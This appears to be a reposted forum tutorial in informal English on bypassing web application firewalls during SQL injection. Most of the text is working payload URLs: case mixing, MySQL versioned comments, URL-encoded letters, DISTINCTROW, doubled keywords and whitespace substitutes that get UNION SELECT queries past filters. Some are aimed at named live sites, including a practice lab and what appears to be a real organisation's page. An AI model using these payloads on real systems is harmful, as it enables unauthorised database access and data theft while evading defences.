Catatan seorang newbie

Now ill show different waf's  we face while we inject sites in some examples ::

example (1)

http://www.site.com/php?id=2 uNiOn-- -  [waf]

http://www.site.com/php?id=2 SeLeCt -- - [no waf]

so here the word blocked  by firewall is word "uNiOn" so ur query should be like


http://www.site.com/php?id=2 /*!50000uNiOn*/ select 1,2,3,4,5-- -

note:: some times using combination of uppercase and lowercase will bypass waf

" so always use a combination of uppercase and lowercase"

like >> uNiOn SeLeCt.***

example (2)

http://www.site.com/php?id=2 uNiOn-- - [no waf]

http://www.site.com/php?id=2 SeLeCt-- - [no waf]

http://www.site.com/php?id=2 uNiOn SeLeCt [waf]


so here firewall is blocking the combine use of union and select so the waf bypass should be applied in between union and select words

http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- -
                          (or)

http://www.site.com/php?id=2 uNiOn%23%0ASeLeCt 1,2,3,4,5-- -


%23 => url encoded form of #
and
%0A => line feed

%23 will terminate the query so using a linefeed (%0A) will make our query work


some times even after using


http://www.site.com/php?id=2 uNiOn DISTINCTROW SeLeCt 1,2,3,4,5-- - [waf]

it blocks the query so better use


http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt 1,2,3,4,5-- -


example (3)

http://www.site.com/php?id=2 uNiOn-- - [waf]

http://www.site.com/php?id=2 SeLeCt-- - [no waf]

http://www.site.com/php?id=2 uNiOn SeLeCt-- - [waf]

now lets try to bypass this

http://www.site.com/php?id=2 /*!50000uNiOn*/ SeLeCt-- - [waf]

http://www.site.com/php?id=2 /*!50000uNiOn*/ DISTINCTROW SeLeCt-- - [waf]

now lets try using url encoding

http://www.site.com/php?id=2 %75nIOn SeLeCt -- -[waf]

http://www.site.com/php?id=2 %75nIOn %73eLeCt-- - [no waf]

here %75 => u and %73 => s   {url encoded form}

example (4)


http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2,3,4,5-- - [waf]


lets go step by step

http://www.site.com/php?id=2 /*!50000union*/-- - [no waf]

http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/-- - [no waf]

http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1-- - [no waf]

http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,2-- - [waf]

if u observe waf apppread after using a comma (,) .Lets try to bypass this

http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2-- - (no waf)

http://www.site.com/php?id=2 /*!50000union*/ DISTINCTROW /*!50000select*/ 1,~~2,~~3,~~4,~~5-- - [bypassed]
                           
                                                                     (or)

http://www.site.com/php?id=2 uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]


example (5)

i see some injectors using uNunionIOn without knowing the purpose of using it.***

when u have to use uNunionIOn ?

lets see

if u observe when ever our query is incomplete site will show an error on page

example

http://www.cobranet.org/about.php?id=1 union-- -


result >>
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

ur getting this error because ur query is incomplete but in some sites when u use

http://www.site.com/php?id=2 union-- -

result >> page doesnot show any error and the page load normally it mean the

word union is being removed or escaped from our query in such case we can use


uNuNionNion


and in some sites  specific letters will be escaped ******

lets see this on a live site

http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOn-- -

result >>
You have an error in your SQL syntax; check the manual that corresponds to

your MySQL server version for the right syntax to use near 'uni-- -'' at line 1

from the above error u can see some letters in the word union are being escaped

so the letters being escpaed have to be used twice to bypass this

http://zixem.altervista.org/SQLi/level3.php?item=3' uNiOnon-- - [bypassed]

result >> You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right syntax to use near '' at line 1


http://zixem.altervista.org/SQLi/level3.php?item=-3' uNiOnon select 1,2,3,4-- -

and we got the vulnerable coloumns.***


example (6)

some times we can see union or select word doesnot get bypassed even after we tried all the alternatives to bypass then using of some special characters may bypass the waf.***



   uni<>on sel<>ect

   uni*on sel*ect

   (uni)(on) (sel)(ect)

   uni[]on sel[]ect

   uni\on sel\ect  etc.************


example (7)

in some sites we face white space block means when ever we use a space there

will be a waf there we can use odd number of apostrophes /* in between spaces

or we can use
%0b
%0d
%C0  etc

>> www.site.com/php?id=2/*****/uNiOn/*****/select/*****/1,2,3,4,5-- -
 
     www.site.com/php?id=2%0bunion%0bselect%0b1,2,3,4,5-- -  etc



tutorial is getting bigger so ill continue this tutorial in the second part of the waf bypassing

hope u understood

[credits to masters yogesh bhagat sir,geek kid, aakash choudhary i learned waf bypassing from these people]

plzz give ur feedback about my tutorial thank u ******

cyaaa.***

source http://forum.sqliwiki.com/showthread.php?tid=4001